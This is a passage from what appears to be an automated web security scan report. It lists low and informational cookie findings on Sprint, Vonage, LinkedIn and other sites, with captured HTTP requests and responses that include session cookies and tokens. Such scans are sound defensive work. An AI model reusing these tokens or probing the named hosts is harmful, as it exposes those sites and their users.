http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&pccr=true&vidn=26E596F005010A07-4000010D201AEE12&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:46:24 GMT
Last-Modified: Fri, 13 May 2011 00:46:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www105
Content-Length: 0
Content-Type: text/plain


12.7. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E; op471landingpagegum=a03o0bv0lg275ci0432m078ca; op471landingpageliid=a03o0bv0lg275ci0432m078ca; s_cc=true; s_nr=1305161439053-New; gpv_pageName=lp_US_afflpdc_index; s_cm=undefinedwww.vonage-forum.comwww.vonage-forum.com; s_cpmcvp=%5B%5B%27Other%2520Referrers-www.vonage-forum.com%27%2C%271305161439058%27%5D%5D

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/
Location: http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&pccr=true&vidn=26E5977005079CA6-60000102A0076E90&&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:50:40 GMT
Last-Modified: Fri, 13 May 2011 00:50:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www21
Content-Length: 0
Content-Type: text/plain


12.8. http://nextelonline.nextel.com/tl/set_tl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nextelonline.nextel.com
Path:   /tl/set_tl.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tl/set_tl.html?34CE0D747C31107C188BD6527E05D4BF HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:16 GMT
Content-type: text/html
Set-Cookie: TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

12.9. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=70613911;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fconnectedplanetonline.com%26xdm_c%3Ddefault3812%26xdm_p%3D1%26;ref=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305161240362;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EL4AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3AaBtQCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS


12.10. http://shop2.sprint.com/en/support/faq/wlnp.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop2.sprint.com
Path:   /en/support/faq/wlnp.shtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/support/faq/wlnp.shtml HTTP/1.1
Host: shop2.sprint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:00 GMT
Set-Cookie: TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com
Content-type: text/html
Content-Length: 324

<script type="text/javascript">location.replace('http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547');</script>


<meta http-equiv="refresh" c
...[SNIP]...

12.11. http://www.linkedin.com/companyInsider

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utmz=23068709.1304721517.5.2.utmcsr=socialfollow.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=23068709.2028061763.1303163602.1304000549.1304721517.5; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8tR8AXa_H87sybQCohL0f5rN4fe7m5AJEEzQz9agYlq3KAZCF6aP-d:1305161207:bd31acd81eafdc11524936bd768546496be4bb6b"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 01:16:46 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:8157137445058115307"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 00:46:46 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19964145525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 01:18:01 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

12.12. http://www.vonage.com/lp/US/afflpdc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
Location: http://www.vonage.com/lp/US/afflpdc/index.php
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 18264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

12.13. http://www.vonage.com/lp/US/afflpdc/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/US/afflpdc/index.php HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 17336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13. Cookie without HttpOnly flag set
There are 100 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



13.1. https://catalyst.fastcatalog.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://catalyst.fastcatalog.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: catalyst.fastcatalog.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.catalysttelecom.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:11:13 GMT
Connection: Keep-Alive
Content-Length: 6220


   <!-- -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
...[SNIP]...

13.2. https://lnp.activationnow.com/lnp/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/j
...[SNIP]...

13.3. http://s.clickability.com/s

Summary

Severity:   Low
Confidence:   Firm
Host:   http://s.clickability.com
Path:   /s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s?&7=97671&8=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&10=Purchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&19=900&21=1&18=0.7688524462282658 HTTP/1.1
Host: s.clickability.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=XSJJRwvp9uaycevK8bvSuzwT7PRE9+yX3HsherrzsbM=; ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99WsCe+kR6r8AP4IQvvNXwSiIuki12HGMINSZF7h9+Dh4k1ZYz3qgr275RnUUHfhZGJr5QX4YXSlZ6KDpwnwzGoY=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:47 GMT
Server: Apache
P3P: policyref="http://www.clickability.com/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 42
X-Server-Name: dv-c1-r1-u14-b11
Connection: close
Content-Type: image/gif
Set-Cookie: Stats_Session=591922186.20480.0000; path=/


13.4. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/911_logo_trc.jpg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/911_logo_trc.jpg.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"23480-1288968421251"
Last-Modified: Fri, 05 Nov 2010 14:47:01 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 23480

...[SNIP]...

13.5. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/Custom_HeadLogo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/Custom_HeadLogo.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"4671-1288970193688"
Last-Modified: Fri, 05 Nov 2010 15:16:33 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 4671

...[SNIP]...

13.6. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-solutions.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-solutions.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"1990-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Content-Length: 1990
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

...[SNIP]...

13.7. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-ticket.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-ticket.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"2226-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 2226

...[SNIP]...

13.8. https://support.connexon.com/images/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
